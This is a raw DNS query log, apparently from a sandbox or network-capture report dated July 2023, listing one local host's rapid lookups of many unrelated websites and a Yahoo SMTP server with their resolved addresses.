                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.418195009 CEST8.8.8.8192.168.2.60x494No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.418195009 CEST8.8.8.8192.168.2.60x494No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.421514034 CEST8.8.8.8192.168.2.60xac91No error (0)www.kernsafe.com104.26.3.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.421514034 CEST8.8.8.8192.168.2.60xac91No error (0)www.kernsafe.com172.67.72.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.421514034 CEST8.8.8.8192.168.2.60xac91No error (0)www.kernsafe.com104.26.2.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.598478079 CEST8.8.8.8192.168.2.60xd84cNo error (0)www.wifi4all.nl188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.598478079 CEST8.8.8.8192.168.2.60xd84cNo error (0)www.wifi4all.nl188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.664906025 CEST8.8.8.8192.168.2.60xdec3No error (0)www.quadlock.comquadlock.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.664906025 CEST8.8.8.8192.168.2.60xdec3No error (0)quadlock.com70.39.251.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.733345032 CEST8.8.8.8192.168.2.60x4ebfNo error (0)www.pdqhomes.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.733345032 CEST8.8.8.8192.168.2.60x4ebfNo error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.733345032 CEST8.8.8.8192.168.2.60x4ebfNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.733345032 CEST8.8.8.8192.168.2.60x4ebfNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.779547930 CEST8.8.8.8192.168.2.60x4ebfNo error (0)www.pdqhomes.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.779547930 CEST8.8.8.8192.168.2.60x4ebfNo error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.779547930 CEST8.8.8.8192.168.2.60x4ebfNo error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.779547930 CEST8.8.8.8192.168.2.60x4ebfNo error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.943511009 CEST8.8.8.8192.168.2.60x5b0cNo error (0)www.alteor.clcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.943511009 CEST8.8.8.8192.168.2.60x5b0cNo error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.943511009 CEST8.8.8.8192.168.2.60x5b0cNo error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.025502920 CEST8.8.8.8192.168.2.60x8fa9Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.027040958 CEST8.8.8.8192.168.2.60x81c9No error (0)www.fcwcvt.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.027040958 CEST8.8.8.8192.168.2.60x81c9No error (0)www.fcwcvt.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.029007912 CEST8.8.8.8192.168.2.60xbae5No error (0)www.tvtools.fi104.21.88.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.029007912 CEST8.8.8.8192.168.2.60xbae5No error (0)www.tvtools.fi172.67.152.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.068689108 CEST8.8.8.8192.168.2.60x8eceNo error (0)www.t-tre.com135.181.73.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.182430983 CEST8.8.8.8192.168.2.60xa966No error (0)www.ora-ito.com213.186.33.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.419372082 CEST8.8.8.8192.168.2.60x3a36No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.598830938 CEST8.8.8.8192.168.2.60xab80No error (0)www.abart.plabart.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.598830938 CEST8.8.8.8192.168.2.60xab80No error (0)abart.pl89.161.163.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.607595921 CEST8.8.8.8192.168.2.60x5b51No error (0)www.credo.edu.pl62.122.190.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.676254988 CEST8.8.8.8192.168.2.60x5a31No error (0)www.abdg.com192.252.154.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.689918995 CEST8.8.8.8192.168.2.60xb3bfNo error (0)www.depalo.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.689918995 CEST8.8.8.8192.168.2.60xb3bfNo error (0)ghs.googlehosted.com172.217.16.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.776643991 CEST8.8.8.8192.168.2.60x62e2No error (0)www.fink.com69.163.218.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.815167904 CEST8.8.8.8192.168.2.60xa7eeNo error (0)www.cokocoko.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.815167904 CEST8.8.8.8192.168.2.60xa7eeNo error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.815167904 CEST8.8.8.8192.168.2.60xa7eeNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:36.815167904 CEST8.8.8.8192.168.2.60xa7eeNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:37.251815081 CEST8.8.8.8192.168.2.60xbd3eNo error (0)www.ora.ecnet.jpora.ecnet.jpCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:37.251815081 CEST8.8.8.8192.168.2.60xbd3eNo error (0)ora.ecnet.jp60.43.154.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:37.271379948 CEST8.8.8.8192.168.2.60x6d3eNo error (0)www.snugpak.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:37.271379948 CEST8.8.8.8192.168.2.60x6d3eNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:37.273937941 CEST8.8.8.8192.168.2.60x6fa7No error (0)www.petsfan.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:37.273937941 CEST8.8.8.8192.168.2.60x6fa7No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:37.273937941 CEST8.8.8.8192.168.2.60x6fa7No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:37.273937941 CEST8.8.8.8192.168.2.60x6fa7No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:37.316488028 CEST8.8.8.8192.168.2.60xbeNo error (0)www.transsib.comwww.studyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:37.316488028 CEST8.8.8.8192.168.2.60xbeNo error (0)www.studyrussian.comstudyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:37.316488028 CEST8.8.8.8192.168.2.60xbeNo error (0)studyrussian.com80.74.154.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:37.359678030 CEST8.8.8.8192.168.2.60x8fe8No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:37.359678030 CEST8.8.8.8192.168.2.60x8fe8No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:37.364392996 CEST8.8.8.8192.168.2.60x2f21No error (0)www.otena.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:38.486303091 CEST8.8.8.8192.168.2.60x8750No error (0)www.naoi-a.com202.254.236.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:38.514707088 CEST8.8.8.8192.168.2.60xd82bNo error (0)www.evcpa.comevcpa.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:38.514707088 CEST8.8.8.8192.168.2.60xd82bNo error (0)evcpa.com192.124.249.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:38.702399969 CEST8.8.8.8192.168.2.60x41f0No error (0)www.nqks.comlive.websites.hibu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:38.702399969 CEST8.8.8.8192.168.2.60x41f0No error (0)live.websites.hibu.comhibu-4.zenedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:38.702399969 CEST8.8.8.8192.168.2.60x41f0No error (0)hibu-4.zenedge.netzemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:38.702399969 CEST8.8.8.8192.168.2.60x41f0No error (0)zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.nethibu34.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:38.702399969 CEST8.8.8.8192.168.2.60x41f0No error (0)hibu34.inregion.waas.oci.oraclecloud.net147.154.3.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:38.725764036 CEST8.8.8.8192.168.2.60x77eNo error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:38.736838102 CEST8.8.8.8192.168.2.60xf226No error (0)www.speelhal.net217.19.237.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:38.833257914 CEST8.8.8.8192.168.2.60xe6dbNo error (0)www.fnsds.orgcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:38.833257914 CEST8.8.8.8192.168.2.60xe6dbNo error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:38.833257914 CEST8.8.8.8192.168.2.60xe6dbNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com52.204.111.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:38.833257914 CEST8.8.8.8192.168.2.60xe6dbNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com3.212.23.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:39.601274014 CEST8.8.8.8192.168.2.60x7324Server failure (2)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:39.923778057 CEST8.8.8.8192.168.2.60xcfc5No error (0)www.myropcb.com74.208.236.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.168167114 CEST8.8.8.8192.168.2.60x2f37No error (0)www.findbc.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.168167114 CEST8.8.8.8192.168.2.60x2f37No error (0)www.findbc.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.171158075 CEST8.8.8.8192.168.2.60xb059No error (0)www.xaicom.esxaicom.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.171158075 CEST8.8.8.8192.168.2.60xb059No error (0)xaicom.es188.165.133.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.173458099 CEST8.8.8.8192.168.2.60xc06eNo error (0)www.hummer.huhummer.huCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.173458099 CEST8.8.8.8192.168.2.60xc06eNo error (0)hummer.hu185.80.51.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.226110935 CEST8.8.8.8192.168.2.60x38adNo error (0)www.crcsi.orgcrcsi.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.226110935 CEST8.8.8.8192.168.2.60x38adNo error (0)crcsi.org165.227.252.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.248150110 CEST8.8.8.8192.168.2.60x1dddNo error (0)www.pohlfood.compohlfood.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.248150110 CEST8.8.8.8192.168.2.60x1dddNo error (0)pohlfood.com104.218.10.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.624131918 CEST8.8.8.8192.168.2.60xcd56No error (0)www.mqs.com.brwww.mqs.com.br.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.624131918 CEST8.8.8.8192.168.2.60xcd56No error (0)www.mqs.com.br.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.624131918 CEST8.8.8.8192.168.2.60xcd56No error (0)www.mqs.com.br.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.644861937 CEST8.8.8.8192.168.2.60x7324Server failure (2)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.645916939 CEST8.8.8.8192.168.2.60x810fNo error (0)www.aevga.comaevga.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.645916939 CEST8.8.8.8192.168.2.60x810fNo error (0)aevga.com108.167.164.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.741023064 CEST8.8.8.8192.168.2.60xcfa5No error (0)www.ora-ito.com213.186.33.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.778213024 CEST8.8.8.8192.168.2.60x2921Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:40.906862974 CEST8.8.8.8192.168.2.60x10a1No error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:41.229327917 CEST8.8.8.8192.168.2.60xcbf0No error (0)www.gpthink.com39.99.233.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:41.337016106 CEST8.8.8.8192.168.2.60x1e1fNo error (0)www.stnic.co.uk77.68.50.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:41.340440989 CEST8.8.8.8192.168.2.60x81d2No error (0)www.yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:41.660460949 CEST8.8.8.8192.168.2.60x7324Server failure (2)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:41.685653925 CEST8.8.8.8192.168.2.60x6fccNo error (0)www.c9dd.com188.166.152.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:41.696556091 CEST8.8.8.8192.168.2.60x22afNo error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:41.771691084 CEST8.8.8.8192.168.2.60xafc6No error (0)www.jchysk.com208.97.178.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:42.162988901 CEST8.8.8.8192.168.2.60x8b52No error (0)www.mobilnic.net154.203.14.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:42.414361954 CEST8.8.8.8192.168.2.60xb3ffNo error (0)www.dayvo.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:42.414361954 CEST8.8.8.8192.168.2.60xb3ffNo error (0)www.dayvo.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:42.748157024 CEST8.8.8.8192.168.2.60x9e70No error (0)www.11tochi.net157.112.176.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:42.754726887 CEST8.8.8.8192.168.2.60x9e70No error (0)www.11tochi.net157.112.176.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:42.858295918 CEST8.8.8.8192.168.2.60xa996No error (0)www.stajum.com162.43.120.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:42.908616066 CEST8.8.8.8192.168.2.60xa367No error (0)www.nelipak.nl82.201.61.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:43.106270075 CEST8.8.8.8192.168.2.60x4992No error (0)www.edimart.hu81.2.194.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:43.212304115 CEST8.8.8.8192.168.2.60xd533No error (0)www.pupi.cz103.224.182.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:43.564179897 CEST8.8.8.8192.168.2.60x1492No error (0)www.waldi.plwaldi.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:43.564179897 CEST8.8.8.8192.168.2.60x1492No error (0)waldi.pl46.242.238.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:43.698741913 CEST8.8.8.8192.168.2.60x1d5cNo error (0)www.pb-games.compb-games.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:43.698741913 CEST8.8.8.8192.168.2.60x1d5cNo error (0)pb-games.com173.254.28.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:43.719144106 CEST8.8.8.8192.168.2.60x7324Server failure (2)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:44.000349045 CEST8.8.8.8192.168.2.60x8bcdNo error (0)www.item-pr.comitem-pr.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:44.000349045 CEST8.8.8.8192.168.2.60x8bcdNo error (0)item-pr.com185.15.129.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:44.000349045 CEST8.8.8.8192.168.2.60x8bcdNo error (0)item-pr.com213.186.33.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:44.583759069 CEST8.8.8.8192.168.2.60x3c49No error (0)www.pcgrate.com172.67.201.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:44.583759069 CEST8.8.8.8192.168.2.60x3c49No error (0)www.pcgrate.com104.21.66.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:44.725244045 CEST8.8.8.8192.168.2.60x24e8No error (0)www.sclover3.com157.112.182.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:44.729708910 CEST8.8.8.8192.168.2.60xe620No error (0)smtp.sbcglobal.yahoo.comsmtp-sbc.mail.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:44.729708910 CEST8.8.8.8192.168.2.60xe620No error (0)smtp-sbc.mail.yahoo.comsmtp1.sbc.mail.am0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:44.729708910 CEST8.8.8.8192.168.2.60xe620No error (0)smtp1.sbc.mail.am0.yahoodns.net67.195.12.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:44.729708910 CEST8.8.8.8192.168.2.60xe620No error (0)smtp1.sbc.mail.am0.yahoodns.net66.218.88.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:44.729708910 CEST8.8.8.8192.168.2.60xe620No error (0)smtp1.sbc.mail.am0.yahoodns.net66.163.170.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:44.767489910 CEST8.8.8.8192.168.2.60xf685No error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:45.009690046 CEST8.8.8.8192.168.2.60x5eb7No error (0)www.domon.commeubles-domon.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:45.009690046 CEST8.8.8.8192.168.2.60x5eb7No error (0)meubles-domon.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:45.009690046 CEST8.8.8.8192.168.2.60x5eb7No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:45.286413908 CEST8.8.8.8192.168.2.60xf521No error (0)www.kernsafe.com104.26.3.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:45.286413908 CEST8.8.8.8192.168.2.60xf521No error (0)www.kernsafe.com172.67.72.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:45.286413908 CEST8.8.8.8192.168.2.60xf521No error (0)www.kernsafe.com104.26.2.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:45.321954012 CEST8.8.8.8192.168.2.60x1ae7No error (0)www.pwd.orgpwd.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:45.321954012 CEST8.8.8.8192.168.2.60x1ae7No error (0)pwd.org208.109.214.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:45.635204077 CEST8.8.8.8192.168.2.60xfae1No error (0)www.fink.com69.163.218.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:46.287290096 CEST8.8.8.8192.168.2.60x1983No error (0)www.netcr.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:46.287290096 CEST8.8.8.8192.168.2.60x1983No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:46.287290096 CEST8.8.8.8192.168.2.60x1983No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:46.287290096 CEST8.8.8.8192.168.2.60x1983No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:46.295593023 CEST8.8.8.8192.168.2.60x1983No error (0)www.netcr.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:46.295593023 CEST8.8.8.8192.168.2.60x1983No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:46.295593023 CEST8.8.8.8192.168.2.60x1983No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:46.295593023 CEST8.8.8.8192.168.2.60x1983No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:46.380970955 CEST8.8.8.8192.168.2.60x31e4No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:46.380970955 CEST8.8.8.8192.168.2.60x31e4No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:46.507977962 CEST8.8.8.8192.168.2.60xd0e4Server failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:46.708606958 CEST8.8.8.8192.168.2.60x7ef5No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:46.831382990 CEST8.8.8.8192.168.2.60x2a13No error (0)www.nqks.comlive.websites.hibu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:46.831382990 CEST8.8.8.8192.168.2.60x2a13No error (0)live.websites.hibu.comhibu-4.zenedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:46.831382990 CEST8.8.8.8192.168.2.60x2a13No error (0)hibu-4.zenedge.netzemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
